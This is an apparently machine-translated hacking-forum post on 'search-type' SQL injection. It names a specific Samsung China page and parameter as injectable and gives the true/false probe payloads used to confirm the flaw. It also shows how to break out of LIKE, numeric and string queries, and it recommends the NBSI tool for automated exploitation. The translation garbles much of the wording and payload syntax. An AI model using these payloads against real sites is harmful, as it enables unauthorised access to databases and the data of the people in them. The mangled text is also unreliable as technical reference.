Search-Type Injection in my opinion --- Injection

Author: allyesno

Yong Ge vowed to write a search injection article, and many people thought it was good.

I don't think so. injection is injection. What is the search type? The novelty of the audience is that they use common injection probes, and many software cannot find injection points!

Today I saw an article about search injection that uses yongge's technology. I would like to take this opportunity to complain.

He detected Samsung: http://notebook.samsung.com.cn/index.aspx

Injection Method:

Generally, the search for a website is partially matched.
Is the vulnerability url A http://notebook.samsung.com.cn/news/news.aspx? Page = 1 & type = product & ST = title & SC =
Construct the injection statement Samsung % and 1 = 1 and % =
Samsung % and 1 = 2 and % =

We can see that the two return pages are different, indicating that the injection vulnerability Feature Word writing notebook is Samsung % and 1 = 1 and % = Yes

 

We know that the general search code is written like this:

Select * from table name where field like '% keyword %'

In this way, all the matches before and after the keywords are created (% is used for all matches)

If the keywords are not filtered, You can construct them as follows:

Keyword = 'and [query condition] and' % 25' ='

In this way, the query becomes

Select * from table name where field like % and 1 = 1 and % = %

In this way, an SQL injection point is formed. Of course, it can be manually used, and nbsi can also be used ~~

There is no need for any injection type !~

If you do not believe it, please refer to the following statement of SQL Injection tianshu

Section 1: General steps of SQL Injection

First, judge the environment, find the injection point, and determine the database type. This is already discussed in the Getting Started article.

Secondly, according to the injection parameter type, the original appearance of the SQL statement is reconstructed in mind. There are three types of parameters:

(A) ID = 49 These injection parameters are numeric. The SQL statement is roughly as follows:
Select * from table name where field = 49
The injected parameter is ID = 49 And [query condition], that is, the generated statement:
Select * from table name where field = 49 And [query condition]

(B) Class = the injection parameters of the series are simplified. The SQL statements are roughly as follows:
Select * from table name where field = 'series'
The injected parameters are Class = series and [query conditions] and ''= ', that is, the generated statement:
Select * from table name where field = 'series' and [query conditions] and ''=''

(C) If parameters are not filtered during search, such as keyword = keyword, the original appearance of the SQL statement is roughly as follows:
Select * from table name where field like '% keyword %'
The injected parameter is keyword = 'and [query condition] and' % 25' = ', which is the generated statement:
Select * from table name where field like '%' and [query condition] and '%' = '%'

Of course, manual intervention is troublesome.

If tools are used, we recommend that you use nbsi tools. As a result, I feel that only nbsi is integrated with this technology and other software cannot be injected.

Write the injection point as long:

Aspx? Page = 1 & type = product & ST = title & SC = % "> http://notebook.samsung.com.cn/news/news.aspx? Page = 1 & type = product & ST = title & SC = %

Add a feature character.